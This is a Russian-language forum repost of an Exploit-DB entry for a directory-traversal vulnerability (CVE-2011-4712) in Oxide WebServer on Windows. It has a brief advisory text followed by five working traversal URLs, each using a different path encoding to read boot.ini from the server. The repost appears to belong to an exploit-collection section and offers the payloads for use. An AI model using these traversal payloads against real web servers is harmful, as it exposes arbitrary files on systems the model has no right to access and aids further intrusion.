Exploit Oxide WebServer - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36376
Проверка EDB
  1. Пройдено
Автор
DEMONALEX
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2011-4712
Дата публикации
2011-11-29
Oxide WebServer - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/50845/info

Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. 

http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini
 
Источник
www.exploit-db.com

Похожие темы